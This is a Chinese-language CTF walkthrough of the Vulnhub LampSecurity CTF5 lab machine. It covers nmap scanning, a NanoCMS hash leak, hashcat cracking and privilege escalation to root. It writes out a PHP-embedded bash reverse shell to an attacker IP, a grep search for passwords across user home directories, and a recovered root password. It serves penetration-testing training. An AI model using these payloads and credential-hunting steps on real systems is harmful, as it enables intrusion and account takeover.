Vulnhub靶机实操笔记-LampSecurity-CTF5
涉及知识内容:NanoCMS利用,hash-identifier,Hashcat破解hash,用户历史记录找敏感信息,内网提权
sudo nmap -sn 192.168.32.0/24
以不低于1w的速度快速扫描端口
sudo nmap --min-rate 10000 -p- 192.168.32.142 -oA report/min-rate
--min-rate #以不低于xxx的速度扫描
-p- #全端口
-oA #将扫描结果输出保存到某个文件夹下某个文件 例子是放在report目录下叫min-rate文件
使用TCP和UDP的形式对扫出的端口进行协议的查看
sudo nmap -sT -sV -O -p22,25,80,110,111,139,143,445,901,3306,52385 192.168.32.142
-sT #以TCP协议进行扫描
-sV #服务的版本号
-O #服务器系统
-p #指定端口
sudo nmap -sU -p22,25,80,110,111,139,143,445,901,3306,52385 192.168.32.142
-sU #以UDP协议扫描
-p #指定端口
-oA #将扫描结果输出保存到某个文件夹下某个文件 例子是放在report目录下叫heavy-U文件
有挺多结果的,可以明显看到通过namp脚本检测我们这个网站存在有SQL注入漏洞的
sudo nmap --script=vuln -p22,25,80,110,111,139,143,445,901,3306,52385 192.168.32.142
访问80端口,系统是一个NanoCMS
查CMS是否存在相关漏洞,有一个RCE漏洞但需要账户密码认证
searchsploit nanocms
Google搜索nanocms的exp,搜索到有一个信息泄露,尝试访问查看细节。
看到cms访问这个文件路径会泄露密码的hash值
利用漏洞获得账户为admin,与一个密码hash值
http://192.168.32.142/~andy/data/pagesdata.txt
判断密文的加密形式,提示最有可能是md5加密
hash-identifier '9d2f75377ac0ab991d40c91fd27e52fd' #判断密文的加密形式
使用hashcat去破解,获得密码shannon
Hashcat 常用选顶参数
-a #指定破解模式
-m #指定Hash类型( 默认MD5 )
-o #将输出结果储存到指定的文件
--force #忽略警告信息
--show #仅显示已经破解的Hash及其对应的明文(近期破解的存放在hashcat.potfile文件中)
--incremen #启用增量破解模式, 可以利用此模式让Hashcat
--increment-min #在指定的密码长度范围内执行破解过程
Hashcat 的破解模式( 用 -a 选顶指定)
-a 0 #Straight ( 字典破解)
-a 1 #Combination ( 组合破解)
-a 3 #Brute-force ( 掩码暴力破解)
-a 6 #Hybrid Wordlist + Mask ( 字典+掩码破解)
-a 7 #Hybrid Mask + WordIist ( 掩码+字典破解)
Hashcat 的Hash 类型( 用 -m 选项指定)
-m 900 MD4
-m 0 MD5
-m 100 SHAI
-m 1300 SHA2-224
-m 1400 SHA2-256
-m 10800 SHA2-384
-m 1700 SHA2-512
-m 10 MD5($pass.$salt)
-m 20 MD5($salt.$pass)
-m 3800 MD5($saIt.$pass.$salt)
-m 3000 LM
-m 1000 N
sudo hashcat -m 0 -a 0 9d2f75377ac0ab991d40c91fd27e52fd /usr/share/wordlists/rockyou.txt
-m #指定Hash类型( 默认MD5 )
-a 0 #Straight ( 字典破解)
尝试获得的账户密码登陆系统
http://192.168.32.142/~andy/data/nanoadmin.php
成功登陆系统
直接改原有的php页面内容
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.32.131/1234 0>&1'");?>
访问点击修改的页面获得shell
获得shell
uname -a
sudo -l
可以看到当前系统用户比较多,尝试找历史记录,从历史记录中招敏感信息
cat /etc/passwd
从用户的历史记录查找敏感信息pass
grep -R -i pass /home/* 2>/dev/null #在/home路径下查找pass信息并将报错信息丢掉
看到有个Root password,尝试去看下这个文件的具体内容 /home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note
找到root密码是 50$cent
一开始直接尝试切换用户发现提示错误,经过一番尝试还得先进行一个pty让其交互提升,再进行用户切换切换到root用户
python -c "import pty;pty.spawn('/bin/sh')"
su -
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。